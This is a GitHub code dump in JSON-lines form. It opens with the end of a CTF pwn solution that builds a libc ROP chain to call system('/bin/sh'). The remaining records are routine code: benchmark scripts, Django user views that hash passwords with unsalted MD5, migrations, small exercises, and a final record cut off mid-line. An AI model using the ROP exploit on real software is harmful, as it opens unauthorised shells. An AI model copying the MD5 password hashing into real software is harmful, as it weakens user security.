puts_addr-libc.symbols['puts']\n\n\n# Stage 2: Exploit the bin/sh\nbin_sh = next(libc.search(b'/bin/sh\\x00'))\nsystem = libc.symbols['system']\nexit = libc.symbols['exit']\n\n# Build second chain\nrop_chain = [ pop_rdi,\n bin_sh,\n system,\n exit\n ]\n\nrop_chain = b''.join([p64(i) for i in rop_chain])\nsecond_payload = payload + rop_chain\nprint(p.recvline())\np.sendline(second_payload)\np.interactive()\n","repo_name":"LalaNguyen/CTF","sub_path":"Year-2020/CSAW/pwn/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29724176481","text":"import sys\nimport os\nimport tempfile\nimport time\nimport csv\nimport subprocess\nfrom datetime import datetime\nimport argparse\nfrom multiprocessing import Pool, Lock, Value\nfrom os.path import expanduser\nimport my_utils\n\n# python3 scripts/run_sguard.py --root_info ~/benchmarks/meta/sb-reentrancy-meta.csv --pgmdir ~/benchmarks/reentrancy/ --outdir sGuard_result/ --process 2\n\nHOME = expanduser(\"~\")\nsGUARD = os.path.join (HOME, \"sGuard\")\nBENCH = os.path.join(HOME, 'benchmarks')\n\nLOCK = Lock ()\ncnt = Value ('i', 0)\n\nKILL_TIMEOUT = \"\"\nOUTDIR_ROOT = \"\"\nTOTAL_NUM = 0\n\nfieldnames_time = [\"dataset\", \"file\", \"timeout\", \"time\", \"before\", \"after\"]\nfieldnames_hist = [\"dataset\", \"file\", \"solv\", \"cmd\", \"when\"]\n\nIO = 'io'\nLS = 'ls'\nRE = 're'\nTX = 'tx'\n\ndef get_pgmdir(dataset):\n pgmdir = \"\"\n if dataset == IO:\n pgmdir = os.path.join(BENCH, 'cve')\n elif dataset == LS:\n pgmdir = os.path.join(BENCH, 'leaking_suicidal')\n elif dataset == RE:\n pgmdir = os.path.join(BENCH, 'reentrancy')\n elif dataset == TX:\n pgmdir = os.path.join(BENCH, 'txorigin')\n assert(pgmdir != \"\")\n return pgmdir\n\ndef run (row):\n dataset = row['dataset']\n fid = row['id']\n fname = fid + \".sol\"\n solv = my_utils.get_solc_version (row)\n main_name = row['main_name']\n pgmdir = get_pgmdir(dataset)\n\n cmd = [\"timeout\", str(KILL_TIMEOUT),\n \"npm\", \"--prefix\", sGUARD, \"run\", \"dev\",\n os.path.join(pgmdir,fname),\n solv,\n os.path.join(OUTDIR_ROOT, dataset),\n main_name]\n \n LOCK.acquire()\n cnt.value += 1\n print (\"processing \" + str(cnt.value) + \"/\" + str(TOTAL_NUM))\n print (\" \".join (cmd))\n LOCK.release()\n\n NOW = str (datetime.now())\n BEFORE = time.time ()\n p = subprocess.Popen (cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n stdout = p.stdout.read()\n AFTER = time.time () # MUST be placed after the previous statement.\n p.wait() # somtimes processes are not immediately killed by 'timeout', so explicitly wait to terminate, in order to get proper return code.\n p.poll () # update p.returncode.\n\n elapsed = AFTER-BEFORE\n timeout = \"\"\n if elapsed >= KILL_TIMEOUT:\n timeout = \"O\"\n assert (p.returncode == 124)\n\n # Record related information\n LOCK.acquire ()\n\n f_res = open (os.path.join (OUTDIR_ROOT, dataset, 'log', fid + \".txt\"), 'w')\n f_time = open (os.path.join (OUTDIR_ROOT, \"time.csv\"), 'a')\n f_history = open (os.path.join (OUTDIR_ROOT, \"cmd_history.csv\"), 'a')\n\n writer_t = csv.DictWriter (f_time, fieldnames=fieldnames_time)\n writer_h = csv.DictWriter (f_history, fieldnames=fieldnames_hist)\n\n f_res.write (stdout.decode(\"utf-8\"))\n writer_t.writerow ({\"dataset\": dataset, \"file\": fname, \"timeout\": timeout, \"time\": str(elapsed), \"before\": str(BEFORE), \"after\": str(AFTER)})\n writer_h.writerow ({\"dataset\": dataset, \"file\": fname, \"solv\":solv, \"cmd\": \" \".join(cmd), \"when\": NOW})\n\n f_res.close()\n f_time.close()\n f_history.close()\n LOCK.release()\n\n\ndef write_csv_header ():\n with open (os.path.join (OUTDIR_ROOT, \"time.csv\"), 'w') as fp:\n writer = csv.DictWriter(fp, fieldnames=fieldnames_time)\n writer.writeheader()\n with open (os.path.join (OUTDIR_ROOT, \"cmd_history.csv\"), 'w') as fp:\n writer = csv.DictWriter(fp, fieldnames=fieldnames_hist)\n writer.writeheader()\n\n\n# Order results according to names of input files\ndef postprocess ():\n with open(os.path.join (OUTDIR_ROOT, \"time.csv\"), 'r') as f_input:\n csv_input = csv.DictReader(f_input)\n data = sorted(csv_input, key=lambda row: row['file'])\n\n with open(os.path.join (OUTDIR_ROOT, \"time.csv\"), 'w') as f_output:\n csv_output = csv.DictWriter(f_output, fieldnames=fieldnames_time)\n csv_output.writeheader()\n csv_output.writerows(data)\n\n with open(os.path.join (OUTDIR_ROOT, \"cmd_history.csv\"), 'r') as f_input:\n csv_input = csv.DictReader(f_input)\n data = sorted(csv_input, key=lambda row: row['file'])\n\n with open(os.path.join (OUTDIR_ROOT, \"cmd_history.csv\"), 'w') as f_output:\n csv_output = csv.DictWriter(f_output, fieldnames=fieldnames_hist)\n csv_output.writeheader()\n csv_output.writerows(data)\n\ndef get_tasks(root_info, dataset, include, exclude, pgmnum):\n rows = []\n with open (root_info, 'r') as fp:\n rows = list(csv.DictReader(fp))\n assert (all(map (lambda row: not (row['actual_order'] == \"\"), rows)))\n assert (len(rows)>=1)\n\n include_lst = []\n if include != \"\":\n include_lst = [line.replace(\"\\r\\n\",\"\").replace (\"\\n\",\"\") for line in open(include)]\n rows = list(filter(lambda row: row['id'] in include_lst, rows))\n\n exclude_lst = []\n if exclude != \"\":\n exclude_lst = [line.replace(\"\\r\\n\",\"\").replace (\"\\n\",\"\") for line in open(exclude)]\n rows = list(filter(lambda row: not (row['id'] in exclude_lst), rows))\n\n if pgmnum==None:\n pass\n elif pgmnum>0:\n rows = rows[:pgmnum]\n else:\n assert(False)\n\n rows = list(filter(lambda row: row['dataset'] in dataset, rows))\n\n global TOTAL_NUM\n TOTAL_NUM = len(rows)\n\n return rows\n\n\ndef setup_globals(kill_timeout, outdir_root):\n global KILL_TIMEOUT\n global OUTDIR_ROOT\n\n KILL_TIMEOUT = kill_timeout\n OUTDIR_ROOT = outdir_root\n\n b = KILL_TIMEOUT != \"\" and OUTDIR_ROOT != \"\"\n assert(b)\n\ndef mk_dataset_dirs(dataset, outroot_dir):\n if IO in dataset:\n os.mkdir(os.path.join(outroot_dir, IO))\n os.mkdir(os.path.join(outroot_dir, IO, 'log'))\n os.mkdir(os.path.join(outroot_dir, IO, 'json'))\n os.mkdir(os.path.join(outroot_dir, IO, 'fixed'))\n if RE in dataset:\n os.mkdir(os.path.join(outroot_dir, RE))\n os.mkdir(os.path.join(outroot_dir, RE, 'log'))\n os.mkdir(os.path.join(outroot_dir, RE, 'json'))\n os.mkdir(os.path.join(outroot_dir, RE, 'fixed'))\n if TX in dataset:\n os.mkdir(os.path.join(outroot_dir, TX))\n os.mkdir(os.path.join(outroot_dir, TX, 'log'))\n os.mkdir(os.path.join(outroot_dir, TX, 'json'))\n os.mkdir(os.path.join(outroot_dir, TX, 'fixed'))\n if LS in dataset:\n assert(False)\n\ndef main ():\n parser = argparse.ArgumentParser()\n \n parser.add_argument ('--root_info', type=str)\n parser.add_argument ('--dataset', type=str, help='{io,ls,re,tx}')\n parser.add_argument ('--outdir_root', type=str)\n parser.add_argument ('--kill_timeout', type=int, default=7800)\n parser.add_argument ('--process', type=int)\n parser.add_argument ('--include', type=str, default='', help='program lists to be included')\n parser.add_argument ('--exclude', type=str, default='', help='program lists to be excluded')\n parser.add_argument ('--pgmnum', type=int)\n\n args = parser.parse_args ()\n\n assert(args.pgmnum == None or args.pgmnum > 0)\n\n setup_globals (args.kill_timeout, args.outdir_root)\n\n dataset = [IO, RE, TX] if args.dataset==None else [d for d in args.dataset.split(',')]\n mk_dataset_dirs(dataset, args.outdir_root)\n\n rows = get_tasks (args.root_info, dataset, args.include, args.exclude, args.pgmnum)\n write_csv_header()\n\n BEFORE = time.time()\n pool = Pool (args.process)\n pool.map (run, rows)\n # https://stackoverflow.com/questions/35708371/purpose-of-pool-join-pool-close-in-multiprocessing\n pool.close () # pool.close tells the pool not to accept any new job.\n pool.join () # pool.join tells the pool to wait until all jobs finished then exit, effectively cleaning up the pool.\n AFTER = time.time ()\n\n print (\"Took: \" + str(AFTER-BEFORE))\n with open (os.path.join (OUTDIR_ROOT, 'took.txt'), 'w') as fp:\n fp.write (str (AFTER-BEFORE))\n\n postprocess ()\n\nif __name__ == \"__main__\":\n main ()\n","repo_name":"kupl/SmartFix-Artifact","sub_path":"fix_experiment/scripts/run_sguard.py","file_name":"run_sguard.py","file_ext":"py","file_size_in_byte":7798,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"41153346374","text":"\"\"\"\nSearcharr\nSonarr, Radarr & Readarr Telegram Bot\nLog Helper\nBy Todd Roberts\nhttps://github.com/toddrob99/searcharr\n\"\"\"\nimport logging\nfrom logging.handlers import TimedRotatingFileHandler\nimport os\n\n\ndef set_up_logger(logger_name, verbose, console):\n if verbose:\n rootLogger = logging.getLogger()\n rootLogger.setLevel(logging.DEBUG)\n\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.DEBUG if verbose else logging.INFO)\n\n formatter = logging.Formatter(\n \"%(asctime)s - %(levelname)8s - %(name)s(%(thread)s):%(lineno)d - %(message)s\"\n )\n\n if console:\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n fileName = f\"{logger_name}.log\"\n logPath = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"logs\")\n if not os.path.exists(logPath):\n os.makedirs(logPath)\n fh = TimedRotatingFileHandler(\n os.path.join(logPath, fileName), when=\"midnight\", interval=1, backupCount=7\n )\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n return logger\n","repo_name":"toddrob99/searcharr","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"77"} +{"seq_id":"36356984865","text":"import base64\nimport random\nfrom django.db import transaction\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nimport json\nfrom django.views import View\nfrom .models import UserProfile\nfrom funit.models import ServiceUnit\nimport hashlib\nfrom dtoken.views import make_token\nfrom django.core.cache import cache\nfrom django.core.mail import send_mail\n# from .tasks import asyn_send_active_email\n# from utils.logging_dec import logging_check\nfrom django.conf import settings\nfrom urllib.parse import urlencode\nimport requests\nimport logging\n\nlog_err=logging.getLogger('err')\nlog_inf=logging.getLogger('inf')\n\n\n# 10100 - 10199 异常状态码\n\n# Create your views here.\ndef users(request):\n print('登录')\n json_str = request.body\n json_obj = json.loads(json_str)\n # {'uname': 'guoxiaonao', 'password': '123456', 'phone': '13488873110', 'email': '250919354@qq.com', 'carts': None}\n username = json_obj['name']\n password = json_obj['password']\n # log_inf.info(f'{username}用户登录')\n log_inf.info(f'{username}用户登录系统')\n print(username, password)\n m = hashlib.md5()\n m.update(password.encode())\n password_m = m.hexdigest()\n # 检查参数\n # 检查用户名是否可用\n old_users = UserProfile.objects.filter(username=username, password=password_m)\n # old_users = UserProfile.objects.filter(username=username, password=password)\n if old_users:\n log_inf.info(f'用户{username},登录系统成功')\n print('登录成功')\n else:\n log_inf.info(f'用户{username}登录系统失败,用户名密码错')\n result = {'code': 10102, 'error': 'The username is already existed !'}\n return JsonResponse(result)\n # token = make_token(username)\n user_id = old_users.values()[0]['id']\n grade = old_users.values()[0]['grade']\n is_active = old_users.values()[0]['is_active']\n use_unit = old_users.values()[0]['use_unit']\n response = JsonResponse({'code': 10101, 'user': {'userName': username, 'user_id': user_id, \"grade\": grade, \"is_active\": is_active, 'use_unit': use_unit}})\n response.set_cookie('username', username, max_age=7 * 24 * 3600)\n request.session['islogin'] = True\n # return JsonResponse({'code':200,'username':username, 'data':{'token':token.decode()}, 'carts_count':0})\n return response\n\n\ndef active_view(request):\n # 获取前端转发的code\n # 校验code\n # code合法 更新用户的is_active\n # 删除redis中对应的key\n code = request.GET.get('code')\n if not code:\n return JsonResponse({'code': 10102, 'error': 'not code'})\n code_str = base64.urlsafe_b64decode(code.encode()).decode()\n\n random_code, username = code_str.split('_')\n\n old_code = cache.get(\"email_active_%s\" % (username))\n if not old_code:\n print('???????1')\n return JsonResponse({'code': 10103, 'error': 'The code is error'})\n\n if old_code != random_code:\n print('???????2')\n return JsonResponse({'code': 10104, 'error': 'The code is error'})\n\n try:\n print('???????3')\n user = UserProfile.objects.get(username=username, is_active=False)\n except Exception as e:\n print('active error is %s' % (e))\n return JsonResponse({'code': 10105, 'error': 'The username is error'})\n\n user.is_active = True\n user.save()\n\n cache.delete(\"email_active_%s\" % (username))\n\n return JsonResponse({'code': 200, 'data': 'OK'})\n\n\n# FBV function base view\ndef address_view(request):\n if request.method == 'GET':\n # 获取地址\n pass\n\n elif request.method == 'POST':\n # 创建地址\n pass\n\n\n# CBV class base view\n# 按需定义 要使用的method 对应的方法\n# 若接收到未定义的动作请求,视图类返回 405响应\ndef re_grade(grade):\n print(grade,'#######')\n data_info = UserProfile.objects.filter(username=grade)\n print(data_info[0].grade)\n return int(data_info[0].grade) + 1\n\n\n# 数据图表展示\nclass tubiao(View):\n def get(self,request):\n print('机器人展示get方法')\n date_str = '机器人展示get方法'\n return date_str\n\n def post(self,request):\n print('机器人展示post方法')\n date_str = '机器人展示post方法'\n return date_str\n\n\n# 获取所有用户\nclass reight(View):\n # resopnse_user = users(request)\n def get(self, request,id):\n print(request.body,id,'%%%%%%%%')\n re_data = []\n if id != 0:\n data_info = UserProfile.objects.filter(use_unit=id)\n else:\n data_info = UserProfile.objects.all()\n for i in data_info.values('id', 'username', 'use_id', 'ment', 'unit_phone', 'chu_name', 'use_iphone',\n 'use_address',\n 'use_unit', 'is_active'):\n # print(i['use_unit'])\n try:\n i['unit_id']=i['use_unit']\n i['use_unit'] = ServiceUnit.objects.get(id=i['use_unit']).unit_name\n except Exception as e:\n i['use_unit']= ''\n # print(use_unit.unit_name)\n re_data.append(i)\n re_data_info = {'data': re_data}\n print(re_data_info,\"========\")\n # log_inf.info('进入查询用户信息页面。。。')\n return JsonResponse(re_data_info)\n\n def post(self, request):\n print('注册')\n json_str = request.body\n json_obj = json.loads(json_str)['data']\n syx_name = json.loads(json_str)['name']\n print(json_obj,'+++++++')\n # {'uname': 'guoxiaonao', 'password': '123456', 'phone': '13488873110', 'email': '250919354@qq.com', 'carts': None}\n username = json_obj['u_name']\n password = json_obj['password']\n use_id = json_obj['use_id']\n ment = json_obj['ment']\n unit_phone = json_obj['unit_phone']\n chu_name = json_obj['chu_name']\n use_iphone = json_obj['use_iphone']\n use_address = json_obj['use_address']\n use_unit = json_obj['use_unit']\n grade = json_obj['grade']\n grade = re_grade(grade)\n print(username, password)\n # 检查参数\n # 检查用户名是否可用\n old_users = UserProfile.objects.filter(username=username)\n if old_users:\n print(\"检测用户名是否存在\")\n result = {'code': 10100, 'error': 'The username is already existed !'}\n log_inf.info('系统用户'+syx_name+'操作系统,用户名'+username+\"已经存在,创建失败!\")\n return JsonResponse(result)\n # 创建用户 UserProfile创建数据\n\n m = hashlib.md5()\n m.update(password.encode())\n password_m = m.hexdigest()\n try:\n user = UserProfile.objects.create(grade=grade, use_unit=use_unit, username=username, password=password_m,\n ment=ment, use_id=use_id, unit_phone=unit_phone, chu_name=chu_name,\n use_iphone=use_iphone, use_address=use_address)\n log_inf.info('系统用户'+syx_name+'操作系统,用户:' + str(username) + ',创建成功!')\n except Exception as e:\n print('---user create error is')\n print(e)\n result = {'code': 10101, 'error': 'The username is already existed !'}\n return JsonResponse(result)\n # 签发jwt token(一天)\n token = make_token(username)\n\n return JsonResponse({'code': 1, 'username': username, 'data': {'token': token.decode()}, 'carts_count': 0})\n\n\n# 用户编辑\nclass reight_id(View):\n def post(self, request, id):\n log_inf.info(f'{id}进入编辑')\n print('编辑')\n json_str = request.body\n json_obj = json.loads(json_str)['data']\n sys_name = json.loads(json_str)['name']\n try:\n print(id)\n in_fo = UserProfile.objects.get(id=id)\n old_username = in_fo.username\n print(in_fo.username,'::原名称')\n in_fo.username = json_obj['username']\n in_fo.use_id = json_obj['use_id']\n # in_fo.unit_phone = json_obj['unit_phone']\n in_fo.unit_phone = json_obj['unit_phone']\n in_fo.chu_name = json_obj['chu_name']\n in_fo.use_iphone = json_obj['use_iphone']\n in_fo.use_address = json_obj['use_address']\n in_fo.ment = json_obj['ment']\n print('现在:',json_obj)\n in_fo.save()\n in_fo.use_unit = ServiceUnit.objects.get(id=in_fo.use_unit).unit_name\n log_inf.info('系统用户'+sys_name+'操作系统,用户:'+old_username+'的信息变更为'+str(json_obj))\n # log_inf.info(f'变更数据{in_fo}')\n print(in_fo)\n return JsonResponse({'code': 1, 'data': {'id':id,'use_unit':in_fo.use_unit,'ment':in_fo.ment,'use_address':in_fo.use_address,'username': in_fo.username,'use_id':in_fo.use_id,'unit_phone':in_fo.unit_phone,'chu_name':in_fo.chu_name,'use_iphone':in_fo.use_iphone}})\n except Exception as e:\n log_inf.info('系统用户'+sys_name+'操作系统,用户'+old_username+\"信息修改失败!\")\n return JsonResponse({'code': 2})\n\n#用户冻结\nclass zhengchang(View):\n def get(self, request,id):\n re_data = []\n if id !=0:\n in_fo = UserProfile.objects.filter(is_active=0, use_unit=id)\n else:\n in_fo = UserProfile.objects.filter(is_active=0)\n print(request,'冻结用户get方法')\n for i in in_fo.values('id', 'username', 'use_id', 'ment', 'unit_phone', 'chu_name', 'use_iphone',\n 'use_address',\n 'use_unit', 'is_active'):\n # print(i['use_unit'])\n try:\n i['use_unit'] = ServiceUnit.objects.get(id=i['use_unit']).unit_name\n except Exception as e:\n i['use_unit'] = ''\n # print(use_unit.unit_name)\n re_data.append(i)\n re_data_info = {'data': re_data}\n print('冻结用户:',re_data_info)\n return JsonResponse(re_data_info)\n\n def post(self, request, id):\n\n data_info = request.body\n json_obj = json.loads(data_info)['data']\n sys_name = json.loads(data_info)['name']\n print(sys_name)\n # in_fo = UserProfile.objects.get(id=id)\n # json_obj1 = json.loads(data_info)['name']\n\n # print(json_obj1,'ppppppppp')\n in_fos = UserProfile.objects.filter(is_active=0)\n user_name = ''\n for i in in_fos.values('id', 'username', 'use_id', 'ment', 'unit_phone', 'chu_name', 'use_iphone',\n 'use_address',\n 'use_unit', 'is_active'):\n if i['id'] == id:\n user_name = i['username']\n json_obj = json.loads(data_info)['data']\n in_fo = UserProfile.objects.get(id=id)\n print('is_active', json_obj)\n in_fo.is_active = json_obj\n in_fo.save()\n log_inf.info('系统用户'+sys_name+'操作系统,用户:'+user_name+'状态变更为“冻结”!')\n return JsonResponse({'code': 1})\n\n\n#用户解冻\nclass thaw_unit(View):\n\n def get(self, request,id):\n print(\"用户解冻get_id:\" ,id)\n re_data = []\n if id != 0:\n in_fo = UserProfile.objects.filter(is_active=1, use_unit=id)\n else:\n in_fo = UserProfile.objects.filter(is_active=1)\n print(in_fo)\n for i in in_fo.values('id', 'username', 'use_id', 'ment', 'unit_phone', 'chu_name', 'use_iphone',\n 'use_address',\n 'use_unit', 'is_active'):\n print('use_unit:',i['use_unit'])\n # i['use_unit'] = ServiceUnit.objects.get(id=i['use_unit']).unit_name\n # print(use_unit.unit_name)\n re_data.append(i)\n re_data_info = {'data': re_data}\n return JsonResponse(re_data_info)\n\n def post(self, request, id):\n print(\"用户解冻post_id:\",id)\n data_info = request.body\n sys_name = json.loads(data_info)['name']\n print(data_info)\n user_name = ''\n in_fos = UserProfile.objects.filter(is_active=1)\n for i in in_fos.values('id', 'username', 'use_id', 'ment', 'unit_phone', 'chu_name', 'use_iphone',\n 'use_address',\n 'use_unit', 'is_active'):\n if i['id']==id:\n user_name = i['username']\n json_obj = json.loads(data_info)['data']\n in_fo = UserProfile.objects.get(id=id)\n print('json_obj', json_obj)\n in_fo.is_active = json_obj\n in_fo.save()\n log_inf.info('系统用户'+sys_name+'操作系统,用户:' + user_name + '状态变更为“解冻”!')\n return JsonResponse({'code': 1})","repo_name":"chinahcl/yingda","sub_path":"DjangoTest/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70300583610","text":"\"\"\"empty message\n\nRevision ID: 1312d9703e28\nRevises: 75c94d9c76df\nCreate Date: 2020-04-10 15:15:04.077650\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '1312d9703e28'\ndown_revision = '75c94d9c76df'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('gladfc',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('glad_id', sa.String(length=20), nullable=True),\n sa.Column('glad_name', sa.String(length=60), nullable=True),\n sa.Column('glad_brh', sa.String(length=100), nullable=True),\n sa.Column('tel_no', sa.String(length=20), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.add_column('employees', sa.Column('glad_id', sa.String(length=60), nullable=True))\n op.add_column('employees', sa.Column('tel_no', sa.String(length=20), nullable=True))\n op.create_index(op.f('ix_employees_glad_id'), 'employees', ['glad_id'], unique=True)\n op.create_index(op.f('ix_employees_tel_no'), 'employees', ['tel_no'], unique=False)\n op.drop_index('ix_employees_first_name', table_name='employees')\n op.drop_index('ix_employees_last_name', table_name='employees')\n op.drop_column('employees', 'first_name')\n op.drop_column('employees', 'last_name')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('employees', sa.Column('last_name', mysql.VARCHAR(length=60), nullable=True))\n op.add_column('employees', sa.Column('first_name', mysql.VARCHAR(length=60), nullable=True))\n op.create_index('ix_employees_last_name', 'employees', ['last_name'], unique=False)\n op.create_index('ix_employees_first_name', 'employees', ['first_name'], unique=False)\n op.drop_index(op.f('ix_employees_tel_no'), table_name='employees')\n op.drop_index(op.f('ix_employees_glad_id'), table_name='employees')\n op.drop_column('employees', 'tel_no')\n op.drop_column('employees', 'glad_id')\n op.drop_table('gladfc')\n # ### end Alembic commands ###\n","repo_name":"rsentra/glad-web","sub_path":"migrations/versions/1312d9703e28_.py","file_name":"1312d9703e28_.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29343716449","text":"#Cálculo del dígito verificador de un rut\nprint(\"Calculadora numero verificador del rut\")\nrut = int(input(\"Porfavor escriba el numero del rut sin puntos: \"))\n\nrut2 = str(rut)\n\nif rut <= 99999999 and rut >= 9999999:\n pri = rut2[7:8]\n pri = int(pri)\n seg = rut2[6:7]\n seg = int(seg)\n ter = rut2[5:6]\n ter = int(ter)\n cur = rut2[4:5]\n cur = int(cur)\n quin = rut2[3:4]\n quin = int(quin)\n sext = rut2 [2:3]\n sext = int (sext)\n sept = rut2 [1:2]\n sept = int(sept)\n oct = rut2 [0:1]\n oct = int(oct)\n\n pri = pri * 2\n seg = seg * 3\n ter = ter * 4\n cur = cur * 5\n quin = quin * 6\n sext = sext * 7\n sept = sept * 2\n oct = oct * 3\n\n cal = (pri + seg + ter + cur + quin + sext +sept + oct) % 11\n det = 11 - cal\n if det == 11:\n print(\"dv=0\")\n elif det == 10:\n print(\"dv=k\")\n else:\n print(\"dv=\", det)\n\nelif rut <= 9999999 and rut > 999999:\n pri = rut2[6:7]\n pri = int(pri)\n seg = rut2[5:6]\n seg = int(seg)\n ter = rut2[4:5]\n ter = int(ter)\n cur = rut2[3:4]\n cur = int(cur)\n quin = rut2 [2:3]\n quin = int (quin)\n sext = rut2 [1:2]\n sext = int(sext)\n sept = rut2 [0:1]\n sept = int(sept)\n\n pri = pri * 2\n seg = seg * 3\n ter = ter * 4\n cur = cur * 5\n quin = quin * 6\n sext = sext * 7\n sept = sept * 2\n \n\n cal = (pri + seg + ter + cur + quin + sext +sept) % 11\n det = 11 - cal\n if det == 11:\n print(\"dv=0\")\n elif det == 10:\n print(\"dv=k\")\n else:\n print(\"dv=\", det)\nelse:\n print(\"El numero introducido es invalido\")\n\n \n ","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej5/hito1_ej5_726b8f123adccedee3d0972f2f662fe4.py","file_name":"hito1_ej5_726b8f123adccedee3d0972f2f662fe4.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36034803617","text":"import random\n\ndef number_guessing():\n secret_number = random.randint(1, 20)\n attempts = 0\n\n print(\"---Welcome to the Number Guessing Game---\")\n print(\"I've picked a number between 1 and 20. GUess it!\")\n\n while True:\n guess = int(input(\"Your guess: \"))\n attempts += 1\n\n if guess == secret_number:\n print(f\"Congratulations! You guessed the number in {attempts} attempts\")\n break\n elif guess < secret_number:\n print(\"Too low. Try again.\")\n else:\n print(\"Too high. Try again.\")\n\nnumber_guessing()","repo_name":"Umutoni-Rita/python-code-bank","sub_path":"number_guessing.py","file_name":"number_guessing.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26687693788","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Branch',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('name', models.CharField(help_text=b'name of the branch', max_length=64)),\n ('type', models.CharField(help_text=b'type of branch: feature/hotfix/etc', max_length=25)),\n ('description', models.CharField(help_text=b'description of the branch', max_length=512)),\n ('current_version', models.IntegerField(default=0)),\n ('is_deleted', models.SmallIntegerField(default=0, help_text=b'logical deletion')),\n ('created_by', models.ForeignKey(help_text=b'branch author', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='BranchRevision',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('revision_number', models.IntegerField(default=0, help_text=b'ordinal number of revision')),\n ('is_deleted', models.SmallIntegerField(default=0, help_text=b'logical deletion')),\n ('branch_ref', models.ForeignKey(to='repository.Branch', help_text=b'references owning branch', null=True)),\n ('previous_revision_ref', models.ForeignKey(to='repository.BranchRevision', help_text=b'references previous revision of the same branch', null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='BranchRevisionChange',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('ordinal', models.IntegerField(default=0, help_text=b'ordinal number of change in change set')),\n ('branch_revision_ref', models.ForeignKey(help_text=b'sandbox reference', to='repository.BranchRevision')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Change',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('content', models.CharField(help_text=b'change content containing the object of the change', max_length=255)),\n ('object_type', models.CharField(help_text=b'type of object being changed', max_length=25)),\n ('object_code', models.CharField(help_text=b'guid, references a concret object being changed', max_length=36)),\n ('change_type', models.IntegerField(help_text=b'defines type of a change', choices=[(0, b'ADD'), (1, b'MODIFY'), (2, b'REMOVE')])),\n ('is_ui_change', models.BooleanField(default=False, help_text=b'specifies if change is UI change of db model change')),\n ('is_deleted', models.SmallIntegerField(default=0, help_text=b'logical deletion')),\n ('made_by', models.ForeignKey(help_text=b'change author', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Project',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('name', models.CharField(help_text=b'name of the project', max_length=64)),\n ('description', models.CharField(help_text=b'description of the project', max_length=512, null=True)),\n ('is_deleted', models.BooleanField(default=False)),\n ('created_by', models.ForeignKey(help_text=b'project author', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Sandbox',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('status', models.SmallIntegerField(default=0, help_text=b'state of sandbox, opened or closed', choices=[(0, b'OPEN'), (1, b'CLOSED')])),\n ('is_deleted', models.SmallIntegerField(default=0, help_text=b'logical deletion')),\n ('bound_to_branch_ref', models.ForeignKey(help_text=b'references a branch for which the sandbox is used for', to='repository.Branch')),\n ('created_by', models.ForeignKey(help_text=b'account who made the sandbox and is its owner of ', to=settings.AUTH_USER_MODEL)),\n ('created_from_branch_revision_ref', models.ForeignKey(help_text=b\"references branch revision that is 'parent' to the sandbox\", to='repository.BranchRevision')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SandboxChange',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('ordinal', models.IntegerField(default=0, help_text=b'ordinal number of change in change set')),\n ('change_ref', models.ForeignKey(help_text=b'change reference', to='repository.Change')),\n ('sandbox_ref', models.ForeignKey(help_text=b'sandbox reference', to='repository.Sandbox')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='branchrevisionchange',\n name='change_ref',\n field=models.ForeignKey(help_text=b'change reference', to='repository.Change'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='branch',\n name='parent_branch_revision',\n field=models.ForeignKey(to='repository.BranchRevision', 